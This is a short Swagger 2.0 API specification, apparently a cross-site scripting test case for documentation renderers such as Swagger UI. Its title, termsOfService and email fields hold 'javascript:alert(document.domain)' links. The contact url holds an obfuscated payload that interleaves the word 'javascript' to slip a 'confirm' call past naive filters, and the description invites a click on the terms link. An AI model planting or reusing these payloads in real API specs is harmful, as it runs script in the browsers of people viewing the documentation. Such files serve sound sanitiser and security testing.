swagger: "2.0"
info: 
  title: "xss javascript:alert(document.domain)"
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.domain)//"
  contact: 
    name: "API Support"
    url: "jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript pjavascriptt:confirm`0`"
    email: "javascript:alert(document.domain)//"
  version: "1.0.1"
